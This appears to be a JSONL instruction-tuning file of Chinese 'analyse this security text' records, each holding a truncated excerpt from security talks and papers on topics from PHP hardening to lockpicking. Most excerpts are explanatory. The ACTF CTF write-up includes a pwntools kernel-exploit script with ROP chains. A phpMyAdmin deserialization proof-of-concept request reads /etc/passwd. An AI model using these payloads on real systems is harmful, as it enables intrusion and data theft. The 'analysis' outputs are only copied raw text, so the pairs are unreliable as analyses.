(*PluginResults, error) // 运插件返回结果 PortPriority(uint16) bool // 返回端的优先级如ssh的端优先级是22,优先级可以让识别更快 Name() string // 返回服务插件的名称 Type() Protocol // 返回该插件的协议类型 TCP或UDP Priority() int // 插件调的优先级数字越优先级越 } package ftp import ( \"net\" \"regexp\" \"github.com/praetorian-inc/fingerprintx/pkg/plugins\" utils \"github.com/praetorian-inc/fingerprintx/pkg/plugins/pluginutils\" ) var ftpResponse = regexp.MustCompile(`\\d{3}[- ](.*)\\r`) const FTP = \"ftp\" type FTPPlugin struct{} func init() { plugins.RegisterPlugin(&FTPPlugin{}) } func (p *FTPPlugin) Run(conn net.Conn, config plugins.PluginConfig) (*plugins.PluginResults, error) { response, err := utils.Recv(conn, config.Timeout) if err != nil { return nil, err } if len(response) == 0 { return nil, nil } matches := ftp", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVladimir Katalov ElcomSo0 Ltd. www.elcomso0.com What Google knows about you and your devices (and how to get it) Academia Sinica, Nankang, Taipei AUG 28-29, 2015 www.elcomso0.com  Curiosity  Privacy  The right to know  Government surveillance  Forensics  Backup and recovery Research mo;va;ons What Google knows about you Page 2 Academia Sinica, Nankang, Taipei AUG 28-29, 2015 www.elcomso0.com  Hacking  Accessing someone else account  Compromising Google  Criminal acRviRes  Profit What this presenta;on is NOT about What Google knows about you Page 3 Most informa,on used for this research is public Academia Sinica, Nankang, Taipei AUG 28-29, 2015 www.elcomso0.com Desktop vs Mobile forensics What Google knows about you Page 4 Academia Sinica, Nankang, Taipei AUG 28-29, 2015 www.elcomso0.com Smartphone sales What Google knows about you Page 5 Source: Gartner, August 2015 Academia Sinica, Nankang, Taipei AUG 28-29, 2015 www.elcomso0.com Enterprise tablet market What Google knows about you Page 6 Source: Q22015 Mobility Index Report Academia Sinica, Nankang, Taipei AUG 28-29, 2015 www.elcomso0.com Apple iCloud  Introduced in Oct 2011 with iOS 5  OpRonal upgrade to iCloud Drive since iOS 8  5 GB free storage, up to 1 TB paid storage  Extremely convenient: over 500 million users Mobile vs Cloud forensics What Google knows about you Page 7 Google mail  900 million users (May2015)  Monthly unique users: 90 million (2014)  Percentage of Americans using Gmail: 24% (2013)  Gmail app downloads from Google Play: 1 billion (2014)  Percentage of Gmail users working on mobile device: 75% (2015) Google Chrome  Google Chrome users: 1 billion (2015)  Percentage of web browser usage: 35% (2013) Android  Number of Android devices: 1 billion (2013)  Android share: over 80%  Average daily Android acRvaRons: 1.5 million  About 25,000 unique devices Academia Sinica, Nankang, Taipei AUG 28-29, 2015 www.elcomso0.com What Apple Knows About You? Page 8 hbps://www.apple.com/privacy/government-inform", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPHP 安全基础详解 www.528163.cn 提供    PHP 安全基础 安全基础 安全基础 安全基础详解 详解 详解 详解    www.528163.cn 提供 PHP 安全基础详解 www.528163.cn 提供 第一章 第一章 第一章 第一章 简介 简介 简介 简介 PHP 已经由一个制作个人网页的工具发展成为了世界上最流行的网络编程 语言它保证了许多网络上最繁忙的站点的运行这一转变带来了亟待关注的问 题那就是性能可维护性可测性可靠性以及最重要的一点安全性 与语言的一些功能如条件表达式循环结构等相比安全性更为抽象事实 上安全性更像是开发者的特性而不是语言的特性任何语言都不能防止不安全 的代码尽管语言的有些特点能对有安全意识的开发人员有作用 本书着眼于 PHP 语言向您展示如何通过操纵 PHP 一些特殊的功能写出安 全的代码本书中的概念适用于任何网络开发平台网络应用程序的安全是一 门年轻的和发展中的学科本书会从理论出发教会您一些好的习惯使您能安 枕无忧从容应对恶意者层出不穷的新的攻击和技巧 本章是本书的基础部分作为学习后续章节的前提将教给您一些原则和经 验 1.1.PHP 功能 功能 功能 功能 PHP 有许多适合于 WEB 开发的功能一些在其它语言中很难实现的普通工 作在 PHP 中变得易如反掌这有好处也有坏处有一个功能比其它功能来更引 人注目这个功能就是 register_globals 1.1.1. 全局变量注册 全局变量注册 全局变量注册 全局变量注册 如果您还能记起早期 WEB 应用开发中使用 C 开发 CGI 程序的话一定会 对繁琐的表单处理深有体会当 PHP 的 register_globals 配置选项打开时复杂 的原始表单处理不复存在公用变量会自动建立它让 PHP 编程变得容易和方 便但同时也带来了安全隐患 事实上register_globals 是无辜的它并不会产生漏洞同时还要开发者犯 错才行可是有两个主要原因导致了您必须在开发和布署应用时关闭 register_globals 第一它会增加安全漏洞的数量 第二隐藏了数据的来源与开发者需要随时跟踪数据的责任相违背 PHP 安全基础详解 www.528163.cn 提供 本书中所有例子都假定 register_globals 已被关闭用超级公用数组如$_GET 和 $_POST 取而代之使用这些数组几乎与 register_globals 开启时的编程方法同 样方便而其中的些许不便是值得的因为它提高了程序的安全性 小提示 如果您必须要开发一个在 register_globals 开启的环境中布署的应用时很重 要的一点是您必须要初始化所有变量并且把 error_reporting 设为 E_ALL(或 E_ALL | E_STRICT)以对未初始化变量进行警告当 register_globals 开启时任 何使用未初始化变量的行为几乎就意味着安全漏洞 1.1.2. 错误报告 错误报告 错误报告 错误报告 没有不会犯错的开发者PHP 的错误报告功能将协助您确认和定位这些错 误可以 PHP 提供的这些详细描述也可能被恶意攻击者看到这就不妙了使 大众看不到报错信息这一点很重要做到这一点很容易只要关闭 display_errors当然如果您希望得到出错信息可以打开 log_errors 选项并在 error_log 选项中设置出错日志文件的保存路径 由于出错报告的级别设定可以导致有些错误无法发现您至少需要把 error_reporting 设为 E_ALL(E_ALL | E_STRICT 是最高的设置, 提供向下兼容的 建议, 如不建议使用的提示). 所有的出错报告级别可以在任意级别进行修改所以您如果使用的是共享的 主机没有权限对 php.ini, httpd.conf, 或 .htaccess 等配置文件进行更改时您可 以在程序中运行出错报告级别配置语句<?php ini_set('error_reporting', E_ALL | E_STRICT); ini_set('display_errors', 'Off'); ini_set('log_errors', 'On'); ini_set('error_log', '/usr/local/apache/logs/error_log'); ?> 小提示 http://php.net/manual/ini.php 对 php.ini 的选项配置作了详尽的说明 PHP 还允许您通过 set_error_handler( ) 函数指定您自已的出错处理函数 <?php set_error_handler('my_error_handler'); ?> 上面程序指定了您自已的出错处理函数 my_error_h", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIntroduction to Lockpicking Alek Amrani DEF CON 17 About Me  Longhorn Lockpicking Club  UT Austin ISO  CS Undergrad Format  First year with Thursday Events  Long time slot  People most likely will come and go  Split time into three portions  Originally intended to be hands on workshop-esc  Lost bag  Picks  Locks  LSI / LLC Event Format  Adventure ensues:  WTF can I do besides bore people for 3 hours  Teach Lockpicking theory  Helps Lockpicking Village ?appreciation?  Entertain?  Build a Demo Lock  Materials scrounged up from walking distance  Started building at 11:30 AM Yesterday (WED 30JUL09)  Looks utterly disgusting, but still functional-ish  Redo Powerpoint Prelim Q & A  Yes?  No?  READY GO Lockpicking Background  Why Lockpicking?  Why hacking?  Same reasons, more or less  Groups  Locksport International (LSI)  The Open Organization Of Lockpickers (TOOOL)  Longhorn Lockpicking Club (LLC)  Fraternal Organization Of Locksport (FOOLs)  Others exist Legality  Check local laws  In general, but not always, it is usually ok to pick your own locks, or locks you have explicit permission to pick  It is not always ok to Cary lockpicks  EX: NYC and Washington DC  I have no idea what the laws in your particular location are. Locks  Various ways to group  Security Level  Pretty arbitrary grouping  Operation  Electronic  Mechanical  Electromechanical  Housing  Mostly obvious Pin Tumbler  Focus will be mostly on these locks  How they work  How we pick them open Pin Tumbler Locks  Housing  Green  Plug  Yellow  Driver Pins  Blue  Key Pins  Red  Shear Line  The point where the plug meets the housing Image from wikipedia.org Pin Tumbler Locks  Peaks and Valleys on Key raise pins  Correct key raises top of key pins to shear line Image from wikipedia.org Pin Tumbler Locks  Peaks and Valleys on Key raise pins  Correct key raises top of key pins to shear line Image from wikipedia.org Pin Tumbler Locks  Wrong key puts pins at wrong height Image from wikipedia.org Pin Tumbler Locks  How", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCON KUNG-FU Defending Yourself @ DefCon Presented by: Rob DeGulielmo rdegulielmo@hotmail.com Defcon 16  asleep at the wheel  Crap! Firefox is possessed!  DNS redirection allowed for malicious code insertion on legitimate webpages 2 2009 DefCon 17 - Con Kung-Fu : Defending Yourself @ DefCon Defcon 16  asleep at the wheel (cont.)  Milw0rm.lzm in /mnt/live/memory/images  Used uselivemod in the BT/Tools directory. Allows you to slipstream a module on the fly  Automatic IP and calls update milw0rm 3 2009 DefCon 17 - Con Kung-Fu : Defending Yourself @ DefCon Defcon 16  asleep at the wheel (cont.)  MBR rootkit  Vmlinuz (compressed kernel) files were replaced with replicas to subvert grub, etc.  Try loading BT w/ nohdd, causes reboot; perhaps because the MBR rootkit depended on virtual memory created on the hdd 4 2009 DefCon 17 - Con Kung-Fu : Defending Yourself @ DefCon What you should have done  Left your laptop at home! 5 2009 DefCon 17 - Con Kung-Fu : Defending Yourself @ DefCon What you should have done  Broadband wireless card  Updates/Patches  Laptop w/no data on it  NOT your work laptop!!  NOT your home laptop!!  Use VM 6 2009 DefCon 17 - Con Kung-Fu : Defending Yourself @ DefCon What you can do now  Lock down BIOS/MBR  Enable system password protection  Enable MBR protection within bios. This makes MBR read-only 7 2009 DefCon 17 - Con Kung-Fu : Defending Yourself @ DefCon What you can do now  Configuration changes (linux/win)  Hosts.deny  Firewall  Close services  Change default root p/w (i.e. BT)  AV  Conky  Hardset DNS servers 8 2009 DefCon 17 - Con Kung-Fu : Defending Yourself @ DefCon What you can do now  Comprehensive Hardening  Security templates (windows)  Bastille (linux) (http://bastille- linux.sourceforge.net/)  HIPS  Block all inbound connections  Protect your DNS entries/ARP/logs 9 2009 DefCon 17 - Con Kung-Fu : Defending Yourself @ DefCon What you can do now  SSH Proxy  Firefox tunneling over SSH  Know your servers SSH key beforehand!! 10 2009 DefCon 1", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nmainframed767 & bigendiansmalls B.U.M. Corp. Confidential Security Necromancy: Further Adventures in Mainframe Hacking mainframed767 & bigendiansmalls B.U.M. Corp. Confidential B.U.M. Corp. Confidential Genesis  Wondered: Whos researching this shit?  Windows 4,951  Mac OSX 2,270  z/OS (mainframe) Source (cvedetails.com) 0\" mainframed767 & bigendiansmalls B.U.M. Corp. Confidential B.U.M. Corp. Confidential ZERO?? WTF  Imagine if you will  Your Doctor calls IBM\"System\"z\"believes\"that\"the\"details\"of\"Security\"/\"Integrity\" APARs\"should\"not\"be\"made\"publically\"\" available.\" With\"the\"criBcal\"workloads\"running\"on\"these\"systems,\"the\" impact\"of\"a\"vulnerability\"being\"exploited,\"however,\"\" could\"severely\"damage\"customer\"operaBons\"and\"business.\"\" One\"of\"the\"benefits\"for\"not\"providing\"vulnerability\"details\"is\" that\"both\"external\"aIackers\"and\"internal\"personnel\"threats\" can\"not\"get\"access\"to\"informaBon\"that\"could\"put\"an\" enterprise\"at\"undue\"risk.\"\" Source\"(ibm.com,\"DOC#\"ZSQ03054SUSENS03)\" mainframed767 & bigendiansmalls B.U.M. Corp. Confidential B.U.M. Corp. Confidential $100,000 Brick mainframed767 & bigendiansmalls B.U.M. Corp. Confidential B.U.M. Corp. Confidential So who are you?  Were just two cools dudes  And we are gonna rock your fucking socks off mainframed767 & bigendiansmalls B.U.M. Corp. Confidential B.U.M. Corp. Confidential S M A L L S B I G E N D I A N mainframed767 & bigendiansmalls B.U.M. Corp. Confidential B.U.M. Corp. Confidential S M A L L S B I G E N D I A N ! Cut my teeth on AS400 ! Love puzzles, breaking things ! Woke up in a panic  because of Mainframe! ! Realized I could get access to my own ! Started Exploit dev research ! Wrote first z/OS shellcode (check your CD) ! Dedicating life to helping poor, unfortunate corporations secure their shit\" mainframed767 & bigendiansmalls B.U.M. Corp. Confidential B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential B.U.M. Corp. Confidential ! in to mainframes in the 90s courtesy of datapac ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIn Need of 'Pair' Review - @kiwihammond, @ichthys101, and @moyix et al. Presenters: Hammond Pearce (@kiwihammond) Benjamin Tan (@ichthys101) In collaboration with: Baleegh Ahmad, Brendan Dolan-Gavitt (@moyix), and Ramesh Karri In Need of 'Pair' Review: Vulnerable Code Contributions by GitHub Copilot #BHUSA @BlackHatEvents In Need of 'Pair' Review - @kiwihammond, @ichthys101, and @moyix et al. Early-career academics / curiosity-driven tomfoolery Hammond @kiwihammond Ben @ichthys101 $ whoamiarewe Ramesh Karri NYU Prof. Baleegh Ahmad NYU Ph.D. student @moyix Brendan Dolan-Gavitt NYU Asst. Prof The rest of our team NYU Research Asst. Prof UCalgary Asst. Prof Kiwis (Aotearoa/New Zealand) Interested in Hardware/Software Cybersecurity In Need of 'Pair' Review - @kiwihammond, @ichthys101, and @moyix et al. Naïve software development In Need of 'Pair' Review - @kiwihammond, @ichthys101, and @moyix et al. June 29, 2021: Github Copilot Lands In Need of 'Pair' Review - @kiwihammond, @ichthys101, and @moyix et al. What does this mean? In Need of 'Pair' Review - @kiwihammond, @ichthys101, and @moyix et al. Embedded Video: https://youtu.be/vtSVNksJRMY In Need of 'Pair' Review - @kiwihammond, @ichthys101, and @moyix et al. In Need of 'Pair' Review - @kiwihammond, @ichthys101, and @moyix et al. Our story: An historical re-enactment Ben, I think Copilot is out to get me! I need help! and also data Hey Brendan you know software security? Lets do some experiments and prove it Yes I am very secure and have 15,000 twitter followers It's lunch time not science time In Need of 'Pair' Review - @kiwihammond, @ichthys101, and @moyix et al. Science Time: How secure are Copilots outputs? In Need of 'Pair' Review - @kiwihammond, @ichthys101, and @moyix et al. Today's talk 1. How do we test Copilot? 2. What did we find out? 3. Why does this matter and what can you do about it? In Need of 'Pair' Review - @kiwihammond, @ichthys101, and @moyix et al. How does it work under-the-hood?  Copilot is a com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nACTF WriteUp By Nu1L ACTF WriteUp By Nu1L Pwn kkk TreePwn MyKvm Crypto RSA LEAK impossible RSA Web poorui beWhatYouWannaBe ToLeSion gogogo Misc signin Mahjoong safer-telegram-bot-1 BlockChain AAADAO bet2loss Pwn kkk 通过ROP打通parser执shellcode, 然后把提权的exp编码后发送过去执 kkk.ko漏洞出现在加密时以block为单位进加密, 没考虑不对其的情况, 造成堆溢出. 提权的话将packet对象伪造成init_cred, 然后设置packetfunc_ptr = commit_creds然后触发就可以提权, 不关 切回户态的问题 但是怎么泄露内核地址呢? 越界读只能泄露kkk.ko的地址, 也没法ROP, 想了很久, 最终解决法是: 爆破. 因为内核基 地址的熵很, 只有24bit, 且实测发现多数情况都是0x1F800000, 0x21100000这样较的数字, 因此爆破花 不了多时间的. #! /usr/bin/python2 # coding=utf-8 import sys from pwn import * import base64 context.log_level = 'debug' context(arch='amd64', os='linux') def Log(name): log.success(name+' = '+hex(eval(name))) def Connect(): if(len(sys.argv)==1): #local cmd = [\"./launch.sh\", \"1\"] sh = process(cmd) else: #remtoe sh = remote(\"123.60.41.85\", 9999) sh.recvuntil('`') cmd = sh.recvuntil('`', drop=True) print(cmd) stamp = os.popen(cmd).read() print(stamp) sh.send(stamp) return sh sh = Connect() def Send(cont): sh.send(base64.b64encode(cont)) def GDB(): gdb.attach(sh, ''' #break *(0x401C0B) #break *(0x401CF3) break *(0x401D41) conti ''') #get pure asm of exp os.system(\"gcc -c exp.c -O2 -o exp.o\") os.system(\"llvm-objcopy-9 --dump-section .text.startup=out ./exp.o\") file = open(\"out\",\"rb\") code = file.read() file.close() rdi = 0x4006a6 # pop rdi; ret; rsi = 0x402a3c # pop rsi; ret; rdx = 0x434162 # pop rdx; ret; rax = 0x4005af # pop rax; ret; syscall = 0x4859c5 # syscall; ret; ret = 0x400416 # ret; read_through_base64 = 0x401ABB def Call(sys, a, b, c): rop = flat(rdi, a) rop+= flat(rsi, b) rop+= flat(rdx, c) rop+= flat(rax, sys) rop+= flat(syscall) return rop buf = 0x6D8000 while True: try: def Try(): for i in range(15): sh.recvuntil('ENTER YOUR PACKET > ') sh.send('\\n') # header exp = p32(0x0) + p32(0x1) exp+= p64(0) exp+= p32(0x876) + p32(0) exp = exp.ljust(0x30, 'A') Send(exp) #Segs exp = p32(7) + p32(0x0) Send(exp) #Seg for i in range(6): exp = p32(0xdeadbeef) + p32(0x100) Se", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n物聯網 BLE 認證機制設計的挑戰 以 Gogoro Smart Scooter 為例 GDCSC 台灣科技大學 資管所 隱私與風險管理實驗室 講師介紹 G D  台灣科技大學 資管所 碩士生  Team T5 CTO (Chief Food Officer)  CHROOT Member  曾任  到處打零工  好學生乖小孩  數位鑑識事件處理威脅情資整合  走在路上偶爾踢到一些漏洞 去年 Synology 送我一台 NAS 希望 Gogoro 也能這麼 nice XD CSC  台灣科技大學 資管所 副教授  夠麻吉股份有限公司 獨立董事  台灣大學 資訊管理 博士  曾任  資誠企業管理顧問股份有限公司協理  意藍科技股份有限公司資深顧問  具有 CISSPCCFPCSSLPCISM 等多 張國際資安認證  近年來除了從事資安研究發表多篇國際 期刊與會議論文外也曾協助多家政府單 位與企業建立資訊安全管理制度或發 掘系統資安漏洞 大綱 1. 介紹 Bluetooth Low Energy安全性分析流程 2. Smartphone 透過 BLE 控制 IoT 裝置需要一套認證機制 3. BLE 4.0 配對有許多限制許多廠商選擇不配對另設計認證機制 4. 重視消費者隱私下硬體識別元(Identifier)受限亂數化 5. 未配對裝置無法取得硬體識別元設計認證機制遇到的挑戰 6. 提出一種更好的認證機制雙計數器強化認證 Bluetooth 4.0 有三種 High Speed Classic Low Energy 用 WiFi 傳資料 最常見的藍牙 原名 Wibree 協定 建立持續連線 可建立持續連線 不建立持續連線 高耗電 中耗電 低耗電 高頻寬 中頻寬 低頻寬 短距離 中距離 長距離 (我沒用過) 耳機鍵盤滑鼠 溫度計手環IoT 裝置 Bluetooth 4.0 Low Energy Method 方向 功能 Request Central -> Peripheral 一般發送訊息 Response Peripheral -> Central 回覆 Request 用 Commands Central -> Peripheral 不用 Response Notifications Peripheral -> Central 不用 Confirm Indications Peripheral -> Central 需要 Confirm Confirmations Central -> Peripheral 回覆 Indication 用 通常電量大的是 Client電量小的是 Server (僅在收到 request 時供電運作) Fig. Ref: Stanfy Inc, 2015 類似 HTTPsession-less 並有七種 method BLE 廣泛應用在 IoT 健康家電產品 長輩有言幹壞事是進步最大的原動力 好奇手養到底在傳輸什麼碗糕封包 內建許多 Profile  時間溫度電源  體重用戶資料  血壓血糖體脂  心跳脈搏跑步  速度方向室內定位 BLE 很容易玩  Nordic nRF App  bleno Node.js BLE 也很容易惡搞控制  在捷運上讓旁邊的小米手環一直震動 Le IoT 想想物聯網 blog 有很不錯的教學 BLE Sniffer 錄封包 都是明文 很多 IoT 裝置 BLE 其實沒有加密 Security Manager Protocol Pairing Bonding Re-establishment Short Term Key Permanent Key Permanent Key BLE 4.0 SMP 配對方式 Pairing方法 MitM 攻擊難度 方便性 Just Works 沒有保護 最方便但沒有辦法驗證裝置 Passkey Entry 簡單暴力猜出PIN 一方要有螢幕一方要有鍵盤 Out-Of-Band 困難走獨立通道 用NFC 等其他方式交換key BLE 4.2 六位數字比對(需有螢幕) Just Works 無法驗證裝置 許多廠商選擇不配對的原因 1. 使用前需要花費時間配對不方便 2. 有已知安全弱點配對不一定比較安全 3. 沒有螢幕顯示則無法進行數字比對 BLE 4.0 隱私保護  硬體識別元 讀取限制  防止 App 追蹤用戶  MAC Address 讀出來是 02000000000000  硬體識別元 亂數化  防止附近設備掃描追蹤用戶  MAC Address 每次重開都不同  配對過的裝置可用 IRK 解出固定 MAC  無硬體識別元增加驗證機制設計的困難 Gogoro Smart Scooter Key Fob Unlock (BLE) ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# phpmyadmin scripts/setup.php 反序列化漏洞WooYun-2016-199433 phpmyadmin 2.x版本中存在一处反序列化漏洞通过该漏洞攻击者可以读取任意文件或执行任意代码 ## 环境搭建 执行如下命令启动phpmyadmin ``` docker compose up -d ``` 环境启动后访问`http://your-ip:8080`即可看到phpmyadmin的首页因为没有连接数据库所以此时会报错但我们这个漏洞的利用与数据库无关所以忽略 ## 漏洞复现 发送如下数据包即可读取`/etc/passwd` ``` POST /scripts/setup.php HTTP/1.1 Host: your-ip:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 80 action=test&configuration=O:10:\"PMA_Config\":1:{s:6:\"source\",s:11:\"/etc/passwd\";} ``` ![](1.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDDoS Black and White Kungfu Revealed (DEF CON 20 Edition) {Tony Miu (aka MT), Anthony Lai (aka Darkfloyd), Alan Chung (aka Avenir), Kelvin Wong (aka Captain)} Valkyrie-X Security Research Group (VXRL) Disclaimer  There is no national secrets leaked here.  Welcome to all national spies.   No real attacks are launched.  Please take it at your own risk. We can't save you from the jail. We don't talk about There is a real good DDoS business in China because it creates attack assignments and lots of defense opportunities in other world. Thank you so much, China, Xie Xie! We don't talk about .... For example: http://www.1380sf.com/ Agenda  Members introduction  Research and Finding  Part 1: Layer-7 DoS vulnerability analysis and discovery.  Part 2: Core Attack Concept and Empower Attack Server with demos  Part 3: Defense Model Biography Tony Miu (aka MT) Apart from a being a researcher at VXRL, MT currently working at Nexusguard Limited. Throughout his tenure, MT has been at the forefront of the cyber war zone - responding to and mitigating myriads of cyber attacks that comes in all forms and manners targeted at crushing their clients' online presence. MT's task is clearly critical. It is therefore imperative that MT be well versed in the light and dark sides of DDoS attack methodologies and undertakes many leading role in both DDoS kungfu and defense model projects. Biography Anthony Lai (aka Darkfloyd)  Focuses on reverse engineering and malware analysis as well as penetration testing. His interest is always falling on CTF and analyzing targeted attacks.  Founder of VXRL.  He has spoken in Black Hat USA 2010, DEF CON 18 and 19, AVTokyo 2011, Hack In Taiwan 2010 and 2011 and Codegate 2012.  His most recent presentation at DEF CON was about APT Secrets in Asia.  His recent fun experience was winning 12,000 TWD with PLUS CTF team in HITCON 2012  Biography Alan Chung (aka Avenir)  Avenir has more than 8 years working experience on Network Security. He currently is working a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSRC混子是如何炼成的 SRC到底应该怎么搞 来自漏洞之王的回复 来自月入几十万的大佬回复 又一个来自月入几十万的大佬回复 信息收集 了解业务 从基础架构分析 运维安全 业务安全 应用安全 内部安全 运维安全 基础服务 网络 服务器&设备 Web(Server 应用层 信息泄露 基础服务 ftp ssh telnet smtp dns smb snmp ldap rsync database vnc activemq elasticsreach hadoop  网络 DDOS 扫描 内网入口 服务器&设备 本地提权 SSL Bash WebServer Tomcat  JBoss Resin Web(logic Apache Nginx Jetty IIS 应用层  压缩文件泄露 备份文件泄露 敏感文件泄露 Strut2 编辑器安全 SVN Git jenkins zabbix cati 信息泄露 操作手册 内部帐号外部业务 代码泄露 截图泄露 Blog  PPT 业务安全 账号体系 风控体系 交易体系 营销活动 账户体系 密码重置 撞裤 批量注册 登陆防控 任意登录 任意注册 身份鉴定 身份盗用 风险控制 风控缺陷 风控遗漏 判定要素 机器识别 营销活动 薅羊毛 买家套现 机器人 垃圾注册 信用炒作 刷单 反爬虫 扫号 刷券 交易体系 一分钱充值 一分钱购物 任意金额充值 一分钱续费 应用安全 推不动的SDL 绕不完的Filter 失效的云WAF SSRF 事件响应不及时 漏洞组合利用 内部安全 人员意识 办公网络 信息收集 User(List Domain(List IP(List Web(List Mail(List 外网IP 内网IP C段 IP 办公网IP 端口 二级三级 备案 第三方 username password mobile mail 中间件 CMS 数据库 基础服务 user(mail 业务mail 角色 公用mail whois 业务资产 work(os oa gitlab jenkins wiki Jira VPN SSO 后台 了解业务 业务内容 业务资产 业务应用 边缘资产比核心更容易出问题 安全总是相对的 三分看命运七分天注定", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKonstantinos Karagiannis CTO, Security Consulting @konstanthacker ethereum is not bitcoin The key component is this idea of a Turing-complete blockchain --Vitalik Buterin smart contracts  Business logic programs  Semi autonomous  Move value, enforce agreements  Creativity the limit literally a billion reasons caveats  No zero days  No customer code  Yes, a methodology  No, I doubt smart contracts will get that smart solidity  Language of choice  High level, compiles to bytecode  Similarities to JavaScript and C  Supports:  libraries  inheritance  user-defined types  assembly inline dev tools  .sol files > bytecode > blockchain  Auditing .sol easier with highlighting  Atom my fave, with plugins  language-ethereum  etheratom  Remixbrowser based solgraph oyente  Symbolic execution tool  Works with EVM byte code or .sol files  Detects 4* vulns  Low false positive rate basic methodology  Interview devs  Load .sol file, preferably with highlighting  Try compiling  Dissect code flowoptional solgraph  Run oyente (cross fingers)  Manually verify 3/4 vuln yay/nays  Proceed to manually check for following vulns reentrancy leave off the first re for savings unchecked send in king of the ether unchecked send gas limits withdraw dont send withdrawn not sent encryption transaction-ordering dependence call-stack depth limit variable or function ambiguity odds and ends  Input validation  require(condition)  Timestamp dependence  Business logic flaws  Separating public/private data get involved dox me  or just keep in touch @konstanthacker konstantinos.karagiannis@bt.com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nI am packer and so can you Mike Sconzo Agenda* *Powered by business synergy Its all about me!  Threat Research at Bit9 + Carbon Black  Enjoy static analysis, machine learning, network forensics, and eating BBQ and pie (yes, I live in TX)  SecRepo.com  @sooshie Whats the problem? Detecting packers, compilers and various artifacts from the development cycle can be really useful when looking at malware or files in general. However, the de facto standard (PEiD) was created over 10 years ago, and there are very few recent signature updates. Is it time for something new and different? Moar?  Zero (or near zero) trust in prior solutions  Approach this from a clustering perspective  Easy to generate signatures  Non-experts want to play too  Cross platform  <Insert Mac Fanboi Statement>  Simple to understand and extend  Fuzzy Matching (similarity)  Understand signature overlap  Percent of each signature matched Refresher Terms, File Structure, 101 PE Simplified PE format Things we care about (today)  LinkerMajorVersion  LinkerMinorVersion  NumberOfSections Tool chain Set of tools used to develop software IDE Compiler Linker Etc This talk will touch on compiler/build environment detection Information provided by the linker, etc will also be used Packer  Program within a program  Generally used to compress or obfuscate PE information  Evade AV  Make static analysis harder Packers, their parts. Packer Compresses/obfuscates the original executable and creates a new executable complete with decompression/deobfuscation code Unpacker A.k.a Stub Run when the new executable is executed and is responsible for producing the original executable Unpackers, how do they work? Take control of AddressOfEntryPoint Run the unpacking routine Find the packed data Restore the data contents Perform relocation fixes Resolve imports since the original executable isnt being loaded by the Windows loader Jump into the original program http://www.stonedcoder.org/~kd/lib/61-267-1-PB.pdf The popular kids ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" '\\\" Copyright (c) 1993 The Regents of the University of California. '\\\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\\\" '\\\" See the file \"license.terms\" for information on usage and redistribution '\\\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\\\" '\\\" RCS: @(#) $Id: glob.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\\\" '\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbName dbClass ", "category": "text_analysis", "source": "security_papers"}
